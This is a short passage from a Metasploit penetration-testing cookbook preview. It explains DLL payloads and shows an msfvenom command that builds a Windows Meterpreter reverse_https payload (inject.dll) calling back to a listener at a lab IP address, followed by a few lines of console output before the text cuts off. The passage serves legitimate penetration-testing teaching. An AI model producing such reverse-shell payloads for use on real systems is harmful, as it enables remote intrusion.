How to do it...

We will start by having a look at the dll output format and how to use it. DLL stands for dynamic-link library, which is Microsoft's implementation of the shared library concept, meaning that they are libraries of functions that can be imported into applications.

  1. First, we will generate our payload using dll as the output format and set up our listener:
root@kali:~# msfconsole -qmsf > msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.216.5 -f dll -o inject.dll[*] exec: msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.216.5 -f dll -o inject.dllNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, ...

Get Metasploit Penetration Testing Cookbook - Third Edition now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.